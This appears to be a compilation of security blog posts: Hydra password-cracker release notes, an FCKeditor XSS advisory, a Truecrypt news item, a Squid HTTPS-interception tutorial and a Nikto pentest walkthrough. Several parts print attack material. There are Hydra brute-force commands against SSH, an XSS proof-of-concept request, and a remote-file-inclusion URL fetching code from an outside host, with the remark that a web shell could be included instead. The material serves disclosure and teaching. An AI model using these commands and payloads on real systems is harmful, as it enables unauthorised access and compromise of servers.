Remove/ Get Rid of Trojan.PWS.Panda.5661 Virus Thoroughly
Hydra Network Logon Cracker 8.0 - Very fast network logon cracker which supports many different services
A very fast network logon cracker which supports many different services.
See the feature sets and services coverage page, including a speed comparison against ncrack and medusa. Passwords are one of the biggest security holes, as every password security study shows.
This tool is proof-of-concept code, written to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.
There are already several login hacker tools available, however none supports more than one protocol to attack or parallelized connects.
It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.
Currently this tool supports the following protocols:
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Changelog for hydra
-------------------
Release 8.0
! Development moved to a public github repository: https://github.com/vanhauser-thc/thc-hydra
* Added module for redis (submitted by Alejandro Ramos, thanks!)
* Added patch which adds Unicode support for the SMB module (thanks to Max Kosmach)
* Added initial interactive password authentication test for ssh (thanks to Joshua Houghton)
* Added patch for xhydra that adds bruteforce generator to the GUI (thanks to Petar Kaleychev)
* Target on the command line can now be a CIDR definition, e.g. 192.168.0.0/24
* With -M, you can now specify a port for each entry (use "target:port" per line)
* Verified that hydra compiles cleanly on QNX / Blackberry 10 :-)
* Bugfixes for -x option:
- password tries were lost when connection errors happened (thanks to Vineet Kumar for reporting)
- fixed crash when used together with -e option
* Fixed a bug that hydra would not compile without libssh (introduced in v7.6)
* Various bugfixes if many targets were attacked in parallel
* Cygwin's Postgresql is working again, hence configure detection re-enabled
* Added gcc compilation security options (if detected to be supported by configure script)
* Enhancements to the secure compilation options
* Checked code with cppcheck and fixed some minor issues.
* Checked code with Coverity. Fixed a lot of small and medium issues.
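As a quick, hypothetical illustration of the two new target features (the hosts, usernames and wordlists below are placeholders, not taken from the release notes):

# CIDR definition directly on the command line
hydra -l admin -P passwords.txt 192.168.0.0/24 ssh

# -M target file with an individual port per entry ("target:port" per line)
printf '10.0.0.5:2222\n10.0.0.6:22\n' > targets.txt
hydra -L users.txt -P passwords.txt -M targets.txt ssh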
#FCKeditor 2.6.10 Cross Site Scripting #XSS
Class: Cross-Site Scripting
Remote: Yes
Published: 2nd June 2014
Credit: Robin Bailey of Dionach (vulns@dionach.com)
Vulnerable: FCKeditor <= 2.6.10
FCKeditor is prone to a reflected cross-site scripting (XSS) vulnerability due to inadequately sanitised user input. An attacker may leverage this issue to run JavaScript in the context of a victim's browser.
FCKeditor 2.6.10 is known to be vulnerable; older versions may also be vulnerable.
Note that this issue is related to CVE-2012-4000, which was a cross-site scripting vulnerability in the values of the textinputs[] array passed to the spellchecker.php page. To resolve that issue, the values of this array were encoded with htmlspecialchars() before being output to the page; however, the array keys were still echoed unencoded.
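Because it is the textinputs[] array keys, rather than the values, that are echoed unencoded, a request along the following lines should trigger the reflection. This is a minimal sketch with an assumed payload (replace [target] accordingly); the author's original PoC follows below.

curl -s "http://[target]/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" \
     --data 'textinputs[<script>alert(1)</script>]=zz'

If the page is vulnerable, the script tag in the array key is echoed back verbatim in the response.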
PoC:
POST http://[target]/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
textinputs[1]=zz

The vendor was notified of this issue, and FCKeditor 2.6.11 was released to address this vulnerability. See the following vendor announcement: http://ckeditor.com/blog/FCKeditor-2.6.11-Released

Timeline:
28/05/2014 Vulnerability identified
28/05/2014 Initial vendor contact
28/05/2014 Vendor response to contact
28/05/2014 Vulnerability disclosed to vendor
29/05/2014 Vendor confirms vulnerability
02/06/2014 Vendor releases patch
02/06/2014 Public disclosure of vulnerability
#Truecrypt is #alive and well and living in #Switzerland
Encryption software product Truecrypt apparently has been revived, days after having been declared dead under mysterious circumstances.
Last Thursday, a notice appeared on the Truecrypt Sourceforge webpage that said, "WARNING: Using Truecrypt is not secure as it may contain unfixed security issues. This page exists only to help migrate existing data encrypted by Truecrypt." It advised users to migrate to built-in encryption.
However, another webpage based in Switzerland appeared over the weekend, with the banner "Truecrypt must not die", promising that it would ensure that the product has a future, and linking to an article in which security expert Steve Gibson confirms that he still believes in the safety of Truecrypt.
The decision to shutter the Truecrypt project was met with surprise, with some assuming that it was the result of a hacking attack. Gibson's post, however, suggests that the developers, having discovered flaws during the ongoing audit, decided to shut the project down rather than fix it.
In a scathing dig at the decision, Gibson told readers, "But that's not the way the internet works. Having created something of such enduring value, which inherently requires significant trust and buy-in, they are rightly unable to now take it back. They might be done with it, but the rest of us are not."
The new website includes the download links removed from Sourceforge, along with a first for Truecrypt - a list of contributors, where previously they had guarded their identities.
The new website is hosted in Switzerland in the hope of avoiding any legal attacks from former developers or customers, allowing the new Truecrypt to fork away from its prior incarnation.
Remove/ Delete Worm:Win32/Vobfus.AAJ Virus and Protect the PC
Remove/ Delete Adware:win32/Fidot Virus and Stop Ads
#Howto Filter #HTTPS Traffic with #Squid 3 on #UbuntuServer
This article will tell you how to compile, set up and configure a Squid proxy capable of filtering encrypted HTTPS connections using the Diladele Web Safety ICAP content filtering server. Being able to look into HTTPS contents greatly increases your ability to control what is allowed and accepted within your network while keeping inappropriate content out.
Why do We Need to Filter HTTPS
The HTTPS protocol was designed to provide a secure means of communication between internet browsers and remote web servers. To achieve this goal, HTTPS encrypts the data passing through an established connection so that it cannot be decrypted in a reasonable amount of time, preventing anyone from sniffing the contents exchanged over the connection. The protocol was primarily invented to enable safe and secure communication between users and financial sites or government institutions over an insecure medium such as the Internet.
Recently, more and more web sites have started to use HTTPS encrypted communications to increase users' online privacy. This trend was probably initiated by Google, which was the first to enable HTTPS by default for all its searches. Although there is no doubt that HTTPS encryption is a good thing for safety on the wire, we must take into account that it also creates several problems for the controlled networks typically found at home or in offices. The main problem is the essence of the HTTPS protocol itself: no one except the browser and the web server is able to see, and thus filter, the transferred data. This may not always be desired. Content that is usually blocked suddenly becomes accessible to anyone. As an example, imagine a school network where minors can see questionable content just by mistyping a search term in Google. Moreover, the law often obliges administrators in educational institutions to block access to such content (e.g. CIPA for educational environments), and encrypted access to web sites makes it nearly impossible to fulfill such an obligation.
In order to overcome these limitations, it is advised to set up HTTPS filtering of web contents with the help of the SSL bump feature of the Squid proxy server and the Diladele Web Safety web filter.
How It Works
In order to filter web requests, the user's browser needs to be explicitly directed to use the proxy deployed in the same network. It is also possible to set up a transparent proxy, but we are not going to explain how this is done in this tutorial because the steps involved are quite different from an explicit proxy setup.
When a user tries to navigate to a web site, the browser sends the request to the proxy server, asking it to get the requested page on the user's behalf. The proxy establishes a new connection to the remote site and returns the response to the browser. If plain HTTP is used, the proxy is able to see the original contents of the response and filter it. In the case of HTTPS, the flow of data is a little different. The browser asks the proxy to establish a virtual tunnel between itself and the remote server and then sends encrypted data through the proxy. The domain name to which a virtual tunnel is being established is usually known, so the proxy is able to block the tunnel when it finds out that the domain name belongs to a prohibited category. Unfortunately this is not a complete solution, as there are a lot of sites on the Internet which are general in nature (like Google or YouTube) but let you easily navigate to something undesired.
To improve the quality of web filtering and get access to the contents of encrypted connections, browsers in the network may be set up to trust the proxy to act on their behalf when establishing HTTPS connections, filtering them and passing the allowed data to clients while blocking everything that is not allowed. Although this assumption is too strict to be implemented in public networks, it is easily doable in controlled home, educational or corporate environments where administrators act as sole owners of the network devices and may enforce any trust rules. Once trust is established, the browser can ask the proxy to connect to a remote site securely over HTTPS; the proxy is able to decrypt the traffic, filter it, encrypt it again and pass it on to the browser. As the browser trusts the proxy, it continues working with the filtered HTTPS without any errors or warnings.
Unfortunately, the Squid versions included in the most common Linux/FreeBSD distributions are not built with the compile switches necessary for successful HTTPS filtering. The proxy administrator needs to recompile Squid, then reinstall and reconfigure it with an additional list of options. Although this process is not very complex, it is complex enough that it helps to have all the necessary steps described exactly. We will provide such instructions for the latest version of one of the most popular Linux distributions: Ubuntu Server 13.10.
Build Squid with SSL Bump and ICAP Client
Before compiling, it is considered good practice to bring the operating system up to date. This can be done by running the following commands in the terminal.
sudo apt-get update && sudo apt-get upgrade && sudo reboot

In order to build Squid from source we need to install some build tools and fetch the sources of Squid and various dependent packages from the Ubuntu repository. This does not need to take place on the production server; it is possible to build Squid on one machine and install the resulting binaries on others.
sudo apt-get install devscripts build-essential fakeroot libssl-dev
sudo apt-get source squid3
sudo apt-get build-dep squid3

Running the following command unpacks the Squid source package together with all system integration scripts and patches provided by the Ubuntu developers.
dpkg-source -x squid3_3.3.8-1ubuntu3.dsc

The sources are unpacked into the squid3-3.3.8 folder. We now need to modify the configure options in debian/rules to include the compiler switches (--enable-ssl and --enable-ssl-crtd) necessary for HTTPS filtering.
patch squid3-3.3.8/debian/rules < rules.patch

The rules.patch file should look like this.
--- rules 2013-11-15 11:49:59.052362467 +0100
+++ rules.new 2013-11-15 11:49:35.412362836 +0100
@@ -19,6 +19,8 @@
DEB_CONFIGURE_EXTRA_FLAGS := --datadir=/usr/share/squid3 \
--sysconfdir=/etc/squid3 \
--mandir=/usr/share/man \
+ --enable-ssl \
+ --enable-ssl-crtd \
--enable-inline \
--enable-async-io=8 \
--enable-storeio="ufs,aufs,diskd,rock" \

One file in the Squid source code needs to be adjusted too (src/ssl/gadgets.cc). This change is needed to prevent the Firefox error sec_error_inadequate_key_usage that usually occurs when doing HTTPS filtering with the latest Firefox browsers. If you use only Google Chrome, Microsoft Internet Explorer or Apple Safari, this step is not required.
Download patches here
patch squid3-3.3.8/src/ssl/gadgets.cc < gadgets.cc.patch

The gadgets.cc.patch file looks like this.
--- gadgets.cc 2013-07-13 09:25:14.000000000 -0400
+++ gadgets.cc.new 2013-11-26 03:25:25.461794704 -0500
@@ -257,7 +257,7 @@
mimicExtensions(Ssl::X509_Pointer & cert, Ssl::X509_Pointer const & mimicCert)
{
static int extensions[]= {
- NID_key_usage,
+ //NID_key_usage,
NID_ext_key_usage,
NID_basic_constraints,
0

Then we build the package using the following command. After a while this command builds all the required *.DEB packages.
cd squid3-3.3.8 && dpkg-buildpackage -rfakeroot -b

Install Diladele Web Safety
The SSL bump feature alone is not enough to block questionable web content. We also need a filtering server that can be paired with Squid. We will use Diladele Web Safety (DDWS), formerly known as QuintoLabs Content Security, for the filtering and blocking part. It is an ICAP daemon capable of integrating with an existing Squid proxy and providing rich content filtering functionality out of the box. It may be used to block illegal or potentially malicious file downloads, remove annoying advertisements, prevent access to various categories of web sites and block resources with explicit content.
We will use version 3.0 of qlproxy, which is in release candidate state and will probably get its final release this month. It was designed specifically with HTTPS filtering in mind and contains a rich web administrator console for performing routine tasks right from the browser.
By default, DDWS comes with four policies preinstalled. The strict policy has the web filter settings set to the maximum level and is meant to protect minors and K-12 students from inappropriate content on the Internet. The relaxed policy blocks only excessive advertisements and is meant for network administrators, teachers and all those who do not need filtered access to the web but would like to avoid most ads. The third policy is tailored to whitelist-only browsing, and the last group contains less restrictive web filtering settings suitable for normal web browsing without explicitly adult content being shown.
In order to install Diladele Web Safety for the Squid proxy, download the package for Ubuntu 13.10 from the Diladele B.V. web site at http://www.quintolabs.com using a browser, or just run the following command in the terminal.
wget http://updates.diladele.com/qlproxy/binaries/3.0.0.3E4A/amd64/release/ubuntu12/qlproxy-3.0.0.3E4A_amd64.deb

The administration console of Diladele Web Safety is built using the Python Django framework and is usually served by the Apache web server. To install the packages required for the correct functioning of the web UI, run the following commands in the terminal.
sudo apt-get install python-pip
sudo pip install django==1.5
sudo apt-get install apache2 libapache2-mod-wsgi

Install the DEB package and perform the integration with Apache by running the following commands.
sudo dpkg --install qlproxy-3.0.0.3E4A_amd64.deb
sudo a2dissite 000-default
sudo a2ensite qlproxy
sudo service apache2 restart

Please note that you may need to uncomment the "#Require all granted" line in /etc/apache2/sites-available/qlproxy.conf if you get Access Denied errors when trying to access Diladele Web Safety's web UI. This is because the Apache configuration syntax changed between Ubuntu 12 and Ubuntu 13. Luckily, this has to be done only once.
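For reference, the Apache 2.4 access control directive that must be active looks roughly like the fragment below; the Directory path is illustrative only, edit the block that already exists in the packaged qlproxy.conf.

# Illustrative fragment; the path below is an assumption, not the packaged default
<Directory "/opt/qlproxy/www">
    # Apache 2.4 replacement for the old "Order allow,deny / Allow from all"
    Require all granted
</Directory>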
Configure Squid for ICAP Filtering and HTTPS Bumping
The Squid packages we compiled previously need to be installed on the system. To perform the installation, run the following commands.
sudo apt-get install ssl-cert
sudo apt-get install squid-langpack
sudo dpkg --install squid3-common_3.3.8-1ubuntu3_all.deb
sudo dpkg --install squid3_3.3.8-1ubuntu3_amd64.deb
sudo dpkg --install squidclient_3.3.8-1ubuntu3_amd64.deb

In order to recreate the original SSL certificates of remote web sites during HTTPS filtering, Squid uses a separate process named ssl_crtd, which needs to be configured like this.
sudo ln -s /usr/lib/squid3/ssl_crtd /bin/ssl_crtd
sudo /bin/ssl_crtd -c -s /var/spool/squid3_ssldb
sudo chown -R proxy:proxy /var/spool/squid3_ssldb

Finally, modify the Squid configuration file /etc/squid3/squid.conf to integrate it with Diladele Web Safety as an ICAP server. Due to its size, the text of the patch is not included in the article directly, but it is part of the download archive.
sudo cp /etc/squid3/squid.conf /etc/squid3/squid.conf.default
sudo patch /etc/squid3/squid.conf < squid.conf.patch
sudo /usr/sbin/squid3 -k parse

From now on Squid is capable of HTTPS filtering, and we can continue adjusting the filtering from the web UI of Diladele Web Safety.
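For orientation, the SSL bump and ICAP part of such a configuration typically looks roughly like the sketch below. The certificate paths, cache sizes and the qlproxy ICAP service URIs are assumptions made for illustration; the squid.conf.patch file from the download archive remains authoritative.

# HTTPS interception (SSL bump) with dynamically generated host certificates
http_port 3128 ssl-bump generate-host-certificates=on dynamic_cert_mem_cache_size=4MB cert=/etc/squid3/myca.pem key=/etc/squid3/myca.pem
ssl_bump server-first all
sslcrtd_program /bin/ssl_crtd -s /var/spool/squid3_ssldb -M 4MB
sslcrtd_children 5
# Hand requests and responses to Diladele Web Safety over ICAP
icap_enable on
icap_service qlproxy1 reqmod_precache icap://127.0.0.1:1344/reqmod bypass=0
icap_service qlproxy2 respmod_precache icap://127.0.0.1:1344/respmod bypass=0
adaptation_access qlproxy1 allow all
adaptation_access qlproxy2 allow all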
Navigate to the web UI and log in with the default name root and password P@ssw0rd. Select Settings / HTTPS Filtering / Filtering Mode. Diladele Web Safety may either filter specific HTTPS sites or all of them with exclusions. Total filtering is better suited to providing very safe network environments.
Select the desired mode, click Save Settings, add target domains or exclusions as you like, and then restart the ICAP server by clicking the green button in the top right corner, as indicated in the following screenshots.
Run the following command in terminal on the proxy.
sudo service squid3 restart

Navigate to google.com and see that HTTPS filtering is indeed active. The following warning shows that Squid was able to bump the SSL connection, filter it and encrypt it again using Diladele Web Safety's generated certificate.
In order to get rid of these warnings, we must install the myca.der certificate file into the browser and mark it as trusted. Navigate to the web UI again, select Settings / HTTPS Filtering / Certificates and choose the certificate that matches your operating system or device. Instructions on how to install the certificate differ slightly for each operating system or device; the following screens show how to install the DER file on the Apple iPad and in Microsoft Internet Explorer. For other devices please take a look at the Online Documentation of Diladele Web Safety.
Reopen your browser, navigate to Google and make sure the certificate warning is gone. If you click on the lock icon in the address bar, it clearly indicates that the google.com certificate was signed by the proxy's certificate and not by Google's original one.
If you try to search Google with some adult-only terms (e.g. NSFW), Diladele Web Safety blocks access to the explicit content and shows its denied page.
Please be sure to change the default certificates that come with the installation package of Diladele Web Safety to something unique for your network. For instructions on how to regenerate your own certificates for this purpose, consult the Online Documentation of Diladele Web Safety.
Summary
Now we have HTTPS web filtering up and running, and our network environment has become a little safer for those who need protection the most. The next steps would be to direct all client browsers to use the Squid proxy, regenerate the default proxy certificates, set up authentication and authorization to get user-specific reports in Diladele Web Safety, integrate it with e.g. Active Directory using Squid's support for Kerberos authentication, and optionally set up transparent HTTPS filtering. It is also advisable to set up a caching DNS server on the Squid proxy to further increase the speed of connections.
Link Reference
- Diladele B.V. web site at http://www.quintolabs.com
- Online Documentation of Diladele Web Safety
- Squid Proxy Wiki on SSL Bumping
- Ubuntu Server 13.10.
Pentesting Web Servers with Nikto in Backtrack and Kali Linux
Nikto is one of the most popular web security applications to reach for when you are beginning a web pentesting project.
You can download Nikto from http://cirt.net/nikto2. The tool is also included in the Backtrack and Kali Linux distributions.
Nikto is an open source web server scanner. It performs tests against web servers, making requests for multiple items. Nikto checks:
- Over 6500 dangerous files/CGIs.
- Outdated versions of more than 1250 web servers.
- Specific problems on over 270 servers.
- Presence of index files.
- HTTP server options like TRACE.
- Installed software and web servers.
Nikto generates a lot of requests quickly and is not designed to be an overly stealthy tool. If you run Nikto against a remote web server, the administrator can read many lines in the web server log that reveal the scan. Some SIEMs have default rules for correlating these logs and may raise an alarm warning the administrators about the attack.
These are the Nikto options.
jnieto@naltor:~$ nikto
Option host requires an argument
-config+ Use this config file
-Cgidirs+ scan these CGI dirs: 'none', 'all', or values like "/cgi/ /cgi-a/"
-dbcheck check database and other key files for syntax errors
-Display+ Turn on/off display outputs
-evasion+ ids evasion technique
-Format+ save file (-o) format
-host+ target host
-Help Extended help information
-id+ Host authentication to use, format is id:pass or id:pass:realm
-list-plugins List all available plugins
-mutate+ Guess additional file names
-mutate-options+ Provide extra information for mutations
-output+ Write output to this file
-nocache Disables the URI cache
-nossl Disables using SSL
-no404 Disables 404 checks
-port+ Port to use (default 80)
-Plugins+ List of plugins to run (default: ALL)
-root+ Prepend root value to all requests, format is /directory
-ssl Force ssl mode on port
-Single Single request mode
-timeout+ Timeout (default 2 seconds)
-Tuning+ Scan tuning
-update Update databases and plugins from CIRT.net
-vhost+ Virtual host (for Host header)
-Version Print plugin and database versions
+ requires a value
Note: This is the short help output. Use -H for full help.
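As a hypothetical illustration of some of these options (the hostname and report file are placeholders), a scan of an HTTPS site that saves its findings to a text report could look like this:

nikto -h www.example.com -port 443 -ssl -output nikto-report.txt -Format txt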
We are going to run Nikto against a server.
jnieto@naltor:~$ nikto -h www.XxXxXxXxXx.es
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: XXX.XXX.XXX.XXX
+ Target Hostname: www.XxXxXxXxXx.es
+ Target Port: 80
+ Start Time: 2013-06-19 16:23:35
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Win32) PHP/5.3.1
+ Retrieved x-powered-by header: PHP/5.3.1
+ robots.txt contains 10 entries which should be manually viewed.
+ ETag header found on server, inode: 1688849860445366, size: 1028, mtime: 0x49b5cedbf3834
+ Multiple index files found: index.php, index.html,
+ PHP/5.3.1 appears to be outdated (current is at least 5.3.5)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Default account found for 'Acceso restringido a usuarios autorizados' at /webalizer/ (ID '', PW '_Cisco'). Cisco device.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /datos/: This might be interesting...
+ OSVDB-3092: /ftp/: This might be interesting...
+ OSVDB-3092: /imagenes/: This might be interesting...
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /README.TXT: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3092: /temp/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_image.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_flash.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_link.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3092: /INSTALL.txt: Default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3092: /install.txt: Install file found may identify site software.
+ OSVDB-3092: /INSTALL.TXT: Install file found may identify site software.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/frmupload.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/fckconfig.js: FCKeditor JavaScript file found.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/browser.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ 6448 items checked: 10 error(s) and 31 item(s) reported on remote host
+ End Time: 2013-06-19 16:27:19 (224 seconds)
---------------------------------------------------------------------------
As you can see, we have found out the server and PHP versions and a lot of interesting folders.
We have discovered an RFI (Remote File Inclusion) on this server...
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
This URL retrieves PHP code from http://cirt.net/rfiinc.txt? with the following content:
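At the time of writing that file contains nothing more than a one-line test script along the lines of the following (reproduced from memory, so treat the exact markup as an approximation):

<?php phpinfo(); ?>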
This code just executes phpinfo(), but if you want, you could include a web shell instead in order to gain access to the server.
The next line is interesting too. Nikto has located some URLs where you could upload files containing your own source code.
+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
Nikto is one of the first applications that I run when a client requests a web audit from me.